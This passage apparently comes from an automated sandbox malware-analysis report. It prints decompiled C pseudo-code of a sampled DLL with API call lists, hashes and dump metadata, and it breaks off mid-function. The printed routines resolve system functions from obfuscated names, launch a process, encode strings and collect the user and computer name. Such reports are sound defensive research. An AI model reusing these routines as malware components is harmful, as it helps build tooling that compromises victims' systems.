                                                  			E00EC816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xecd33c; // 0x3009bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00EC70F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xecc1ac;
				}
				_t46 = E00EC8022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00EC2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xecd27c; // 0x213a5a8
						_t16 = _t75 + 0xeceb28; // 0x530025
						 *0xecd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00EC70F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xecc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00EC2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00EC9039(_v20);
						} else {
							_t66 =  *0xecd27c; // 0x213a5a8
							_t31 = _t66 + 0xecec48; // 0x73006d
							 *0xecd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00EC9039(_v12);
				}
				return _v24;
			}




























                                                  0x00ec8174
                                                  0x00ec817a
                                                  0x00ec8181
                                                  0x00ec8187
                                                  0x00ec818b
                                                  0x00ec818f
                                                  0x00ec8192
                                                  0x00ec8199
                                                  0x00ec819c
                                                  0x00ec819e
                                                  0x00ec819e
                                                  0x00ec81a7
                                                  0x00ec81ae
                                                  0x00ec81b1
                                                  0x00ec81b7
                                                  0x00ec81c1
                                                  0x00ec81ca
                                                  0x00ec81d1
                                                  0x00ec81ea
                                                  0x00ec81f1
                                                  0x00ec81f4
                                                  0x00ec81fd
                                                  0x00ec8206
                                                  0x00ec8217
                                                  0x00ec8220
                                                  0x00ec8224
                                                  0x00ec8228
                                                  0x00ec822f
                                                  0x00ec8232
                                                  0x00ec8234
                                                  0x00ec8234
                                                  0x00ec823e
                                                  0x00ec8247
                                                  0x00ec824e
                                                  0x00ec8266
                                                  0x00ec826a
                                                  0x00ec82a7
                                                  0x00ec826c
                                                  0x00ec826f
                                                  0x00ec8277
                                                  0x00ec8288
                                                  0x00ec8294
                                                  0x00ec829c
                                                  0x00ec82a0
                                                  0x00ec82a0
                                                  0x00ec826a
                                                  0x00ec82af
                                                  0x00ec82b4
                                                  0x00ec82bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00EC8181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00EC81C1
                                                  • lstrlen.KERNEL32(00000000), ref: 00EC81CA
                                                  • lstrlen.KERNEL32(00000000), ref: 00EC81D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 00EC81DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 00EC823E
                                                  • lstrlen.KERNEL32(?), ref: 00EC8247
                                                  • lstrlen.KERNEL32(?), ref: 00EC824E
                                                  • lstrlenW.KERNEL32(?), ref: 00EC8255
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: faf4f67aa085b97f44aff6052a9d934dc0283d811c544fd7b29f5435ea7371fe
                                                  • Instruction ID: 6fa7ef4da559ad12a29195d6707e943bbbb4edf4022bd4f98fa32a55dd3f31f6
                                                  • Opcode Fuzzy Hash: faf4f67aa085b97f44aff6052a9d934dc0283d811c544fd7b29f5435ea7371fe
                                                  • Instruction Fuzzy Hash: 84412B72800119EFDF11AFA5CE0AE9EBBB5EF48314F154065ED04B7221DB369A16EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00EC205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00EC692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00ECA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xecd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xecd27c; // 0x213a5a8
					_t18 = _t47 + 0xece3e6; // 0x73797325
					_t68 = E00EC95B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xecd27c; // 0x213a5a8
						_t19 = _t50 + 0xece747; // 0x3008cef
						_t20 = _t50 + 0xece0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00EC84D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00EC84D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xecd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00EC9039(_t70);
				goto L12;
			}


















                                                  0x00ec2066
                                                  0x00ec2066
                                                  0x00ec2075
                                                  0x00ec207e
                                                  0x00ec2081
                                                  0x00ec218e
                                                  0x00ec2195
                                                  0x00ec2195
                                                  0x00ec2090
                                                  0x00ec2098
                                                  0x00ec209d
                                                  0x00ec20a0
                                                  0x00ec20b5
                                                  0x00ec20bb
                                                  0x00ec20bc
                                                  0x00ec20bf
                                                  0x00ec20c5
                                                  0x00ec20c8
                                                  0x00ec20cd
                                                  0x00ec20d5
                                                  0x00ec20e1
                                                  0x00ec20e5
                                                  0x00ec2175
                                                  0x00ec20eb
                                                  0x00ec20eb
                                                  0x00ec20f0
                                                  0x00ec20f7
                                                  0x00ec210b
                                                  0x00ec210f
                                                  0x00ec215e
                                                  0x00ec2111
                                                  0x00ec2112
                                                  0x00ec2119
                                                  0x00ec2132
                                                  0x00ec2134
                                                  0x00ec2138
                                                  0x00ec213f
                                                  0x00ec2159
                                                  0x00ec2141
                                                  0x00ec214a
                                                  0x00ec214f
                                                  0x00ec214f
                                                  0x00ec213f
                                                  0x00ec216d
                                                  0x00ec216d
                                                  0x00ec20e5
                                                  0x00ec217c
                                                  0x00ec2185
                                                  0x00ec2189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00EC692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00EC207A,?,00000001,?,?,00000000,00000000), ref: 00EC6951
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00EC6973
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00EC6989
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00EC699F
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00EC69B5
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00EC69CB
                                                  • memset.NTDLL ref: 00EC20C8
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00EC1354,73797325), ref: 00EC95C2
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00EC95DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,03008CEF,73797325), ref: 00EC20FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC2105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00EC216D
                                                    • Part of subcall function 00EC84D5: GetProcAddress.KERNEL32(36776F57,00EC21E5), ref: 00EC84F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00EC214A
                                                  • CloseHandle.KERNEL32(?), ref: 00EC214F
                                                  • GetLastError.KERNEL32(00000001), ref: 00EC2153
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: c9f179db61a54b11212998cb605e05d10147cd21f400c93a91f1b672a0af9eff
                                                  • Instruction ID: a887c220b1e4e3b29b0d94572dff915d2ba9bef9f6623a289514f25de28e7b73
                                                  • Opcode Fuzzy Hash: c9f179db61a54b11212998cb605e05d10147cd21f400c93a91f1b672a0af9eff
                                                  • Instruction Fuzzy Hash: 95314CB2800208EFDB109FA5DD89E9EBBBCEB08344F15446AE605B7221D7369D0A8B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC8307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E00EC8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xecd27c; // 0x213a5a8
				_t1 = _t9 + 0xece62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00EC9401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00EC2049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00EC7225(_t34, _t41, _a8);
						E00EC9039(_t41);
						_t42 = E00EC8E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00EC9039(_t36);
							_t36 = _t42;
						}
						_t43 = E00EC788B(_t36, _t33);
						if(_t43 != 0) {
							E00EC9039(_t36);
							_t36 = _t43;
						}
					}
					E00EC9039(_t28);
				}
				return _t36;
			}














                                                  0x00ec8307
                                                  0x00ec830a
                                                  0x00ec830b
                                                  0x00ec8313
                                                  0x00ec831a
                                                  0x00ec8321
                                                  0x00ec8325
                                                  0x00ec832b
                                                  0x00ec8332
                                                  0x00ec8337
                                                  0x00ec8349
                                                  0x00ec834d
                                                  0x00ec8351
                                                  0x00ec8357
                                                  0x00ec835c
                                                  0x00ec836c
                                                  0x00ec836e
                                                  0x00ec8385
                                                  0x00ec8389
                                                  0x00ec838c
                                                  0x00ec8391
                                                  0x00ec8391
                                                  0x00ec839a
                                                  0x00ec839e
                                                  0x00ec83a1
                                                  0x00ec83a6
                                                  0x00ec83a6
                                                  0x00ec839e
                                                  0x00ec83a9
                                                  0x00ec83a9
                                                  0x00ec83b4

                                                  APIs
                                                    • Part of subcall function 00EC9401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00EC8321,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?), ref: 00EC9468
                                                    • Part of subcall function 00EC9401: sprintf.NTDLL ref: 00EC9489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                  • lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • strcpy.NTDLL ref: 00EC8351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00EC836B,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC723C
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                    • Part of subcall function 00EC8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00EC8385,00000000,?,?,00ECA428,?,030095B0), ref: 00EC8E8C
                                                    • Part of subcall function 00EC8E82: _snprintf.NTDLL ref: 00EC8EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: dbc16667235cda8ae65ccec54cd089fbfac5c05125ae718ad1b89d4c757ea7d9
                                                  • Instruction ID: 199431edb5b6ea2558b4444574cd2623d61696c50e3aaedc0c4987a0e47ec5f7
                                                  • Opcode Fuzzy Hash: dbc16667235cda8ae65ccec54cd089fbfac5c05125ae718ad1b89d4c757ea7d9
                                                  • Instruction Fuzzy Hash: B311E733501624AB46116BF99F8AE6E36DDAF44764305202EF904B7202CE37DD0397A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC6CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EC6D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00EC6D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EC6D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DC3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b7dfdbf2ee01cae2dc1c550cb940f8d1d99ec1ea95adf9f90e73552ed7364eae
                                                  • Instruction ID: 3a3836597335aec2acb86d94c73ac74396fc6dcafdb99a4206f6073e42a87cb1
                                                  • Opcode Fuzzy Hash: b7dfdbf2ee01cae2dc1c550cb940f8d1d99ec1ea95adf9f90e73552ed7364eae
                                                  • Instruction Fuzzy Hash: 2E315132D00609AFDF01EFB8C944A9FBBB5AF49304F144469E915FB120D7729D0ACB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00EC2049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xecd27c; // 0x213a5a8
					_t1 = _t23 + 0xece11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xecd27c; // 0x213a5a8
					_t2 = _t26 + 0xece769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00EC9039(_t54);
					} else {
						_t30 =  *0xecd27c; // 0x213a5a8
						_t5 = _t30 + 0xece756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xecd27c; // 0x213a5a8
							_t7 = _t33 + 0xece40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xecd27c; // 0x213a5a8
								_t9 = _t36 + 0xece4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xecd27c; // 0x213a5a8
									_t11 = _t39 + 0xece779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00EC727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x00ec693b
                                                  0x00ec693f
                                                  0x00ec6a01
                                                  0x00ec6945
                                                  0x00ec6945
                                                  0x00ec694a
                                                  0x00ec695d
                                                  0x00ec695f
                                                  0x00ec6964
                                                  0x00ec696c
                                                  0x00ec6973
                                                  0x00ec6977
                                                  0x00ec697a
                                                  0x00ec69f9
                                                  0x00ec69fa
                                                  0x00ec697c
                                                  0x00ec697c
                                                  0x00ec6981
                                                  0x00ec6989
                                                  0x00ec698d
                                                  0x00ec6990
                                                  0x00000000
                                                  0x00ec6992
                                                  0x00ec6992
                                                  0x00ec6997
                                                  0x00ec699f
                                                  0x00ec69a3
                                                  0x00ec69a6
                                                  0x00000000
                                                  0x00ec69a8
                                                  0x00ec69a8
                                                  0x00ec69ad
                                                  0x00ec69b5
                                                  0x00ec69b9
                                                  0x00ec69bc
                                                  0x00000000
                                                  0x00ec69be
                                                  0x00ec69be
                                                  0x00ec69c3
                                                  0x00ec69cb
                                                  0x00ec69cf
                                                  0x00ec69d2
                                                  0x00000000
                                                  0x00ec69d4
                                                  0x00ec69da
                                                  0x00ec69df
                                                  0x00ec69e6
                                                  0x00ec69ed
                                                  0x00ec69f0
                                                  0x00000000
                                                  0x00ec69f2
                                                  0x00ec69f5
                                                  0x00ec69f5
                                                  0x00ec69f0
                                                  0x00ec69d2
                                                  0x00ec69bc
                                                  0x00ec69a6
                                                  0x00ec6990
                                                  0x00ec697a
                                                  0x00ec6a0f

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00EC207A,?,00000001,?,?,00000000,00000000), ref: 00EC6951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00EC6973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00EC6989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00EC699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00EC69B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00EC69CB
                                                    • Part of subcall function 00EC727B: memset.NTDLL ref: 00EC72FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 595d17303353258b788b8943cfa5fab2a502e439d40d62c63181ccf3f0c19e50
                                                  • Instruction ID: 5106cbad15c569e1d709629c9abcd5277bc51c3d83575de517c453ddc1aca6a9
                                                  • Opcode Fuzzy Hash: 595d17303353258b788b8943cfa5fab2a502e439d40d62c63181ccf3f0c19e50
                                                  • Instruction Fuzzy Hash: AB216DB150120ADFDB20DFAADD44E6B77ECEB08344716517AEA15E7311D632ED068B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7323, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC7323(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				signed char* _t46;
				void* _t52;
				int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t52 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t54 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E00EC2049(_t54);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xecd2d4, 0x90);
					_t27 =  *0xecd2d8; // 0x0
					_t58 = _t57 + 0xc;
					if(_t27 != 0) {
						E00EC8F83(_t46, _a4, 0x90, _t27, 0);
					}
					if(E00ECA7C2( &_v36) != 0 && E00EC6DE4(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t56 = _v20;
						_v36 =  *_t46;
						_v16 = E00EC6F1D(_t56, _a8, _t52, _t46, _a12);
						 *(_t56 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875fc
						memset(_t56, 0, _v12 - ( *_t20 & 0xf));
						_t58 = _t58 + 0xc;
						E00EC9039(_t56);
					}
					memset(_a4, 0, _t54);
					E00EC9039(_a4);
				}
				return _v16;
			}
















                                                  0x00ec7323
                                                  0x00ec7329
                                                  0x00ec732e
                                                  0x00ec733b
                                                  0x00ec733e
                                                  0x00ec7341
                                                  0x00ec7348
                                                  0x00ec734b
                                                  0x00ec7359
                                                  0x00ec735e
                                                  0x00ec7363
                                                  0x00ec7368
                                                  0x00ec7373
                                                  0x00ec7373
                                                  0x00ec7382
                                                  0x00ec73a5
                                                  0x00ec73ab
                                                  0x00ec73b9
                                                  0x00ec73bf
                                                  0x00ec73c2
                                                  0x00ec73cf
                                                  0x00ec73d4
                                                  0x00ec73d8
                                                  0x00ec73d8
                                                  0x00ec73e3
                                                  0x00ec73ee
                                                  0x00ec73ee
                                                  0x00ec73fa

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memcpy.NTDLL(00000000,00000090,00000002,00000002,_h,00000008,_h,_h,?,00EC858C,_h), ref: 00EC7359
                                                  • memset.NTDLL ref: 00EC73CF
                                                  • memset.NTDLL ref: 00EC73E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset$AllocateHeapmemcpy
                                                  • String ID: _h$_h
                                                  • API String ID: 1529149438-1171608278
                                                  • Opcode ID: 5c151f7181da0136d3d24e57c67cfb6a57558cb42cea851cfb12974789c4677b
                                                  • Instruction ID: 7c575f9e871c15f94580a97869250aaea072c80aff3bfebf4e7f49be0018b813
                                                  • Opcode Fuzzy Hash: 5c151f7181da0136d3d24e57c67cfb6a57558cb42cea851cfb12974789c4677b
                                                  • Instruction Fuzzy Hash: 1E213071A00218ABDB11AF65DD42FEEBBF8AF09340F04402AFD14F6251D736DA02CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC7649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E00EC2049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E00EC9039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
